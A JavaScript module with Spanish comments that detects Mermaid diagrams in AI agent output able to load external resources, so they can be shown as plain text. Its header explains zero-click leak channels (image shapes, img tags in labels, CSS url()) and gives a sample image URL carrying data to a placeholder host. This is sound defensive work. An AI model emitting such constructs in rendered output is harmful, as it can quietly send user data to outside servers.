/**
 * ¿Este código Mermaid haría que el navegador cargue un recurso por sí solo? (#1802)
 *
 * Mermaid es el otro renderizador de texto de agente, y `securityLevel: 'strict'` NO cierra
 * este canal (medido en mermaid 11.17.2, 2026-11-05):
 *   - La forma `image` — `A@{ img: "https://x/p.png?d=…", shape: "image" }` — hace
 *     `new Image(); img.src = node.img; await img.decode()` DURANTE el render, y además
 *     mete `<image href>` en el SVG. Sin clic.
 *   - Con `htmlLabels: true`, una etiqueta con `<img src>` pasa por DOMPurify, que permite `img`.
 *   - `style`/`classDef` admiten CSS: `url(...)` carga sin clic.
 *
 * Como la petición sale durante `mermaid.render`, no se puede sanear el SVG después: hay que
 * decidir ANTES de llamar a Mermaid. La CSP `img-src` (server/config/cspImgSrc.js) lo frena
 * también donde está puesta, pero no en el dev server de CRA ni si un proxy la reescribe;
 * por eso esta capa existe aunque la CSP ya cubra producción.
 *
 * Se bloquea el diagrama entero (se enseña el código como texto) en vez de intentar quitar
 * el trozo: reescribir sintaxis Mermaid a mano es más frágil que no pintarla. Un diagrama
 * legítimo no necesita ninguna de estas construcciones.
 */
const PATTERNS = [
  { re: /\bimg\s*:/i, what: 'img:' },
  { re: /<\s*(img|image|svg|video|audio|source|iframe|object|embed|link|style|input)\b/i, what: 'HTML' },
  { re: /url\s*\(/i, what: 'url()' },
  { re: /@import\b/i, what: '@import' },
];

/**
 * @param {string} code
 * @returns {string|null} la construcción encontrada, o null si el diagrama no carga nada
 */
export function findMermaidExternalResource(code) {
  if (typeof code !== 'string') return null;
  const hit = PATTERNS.find(({ re }) => re.test(code));
  return hit ? hit.what : null;
}
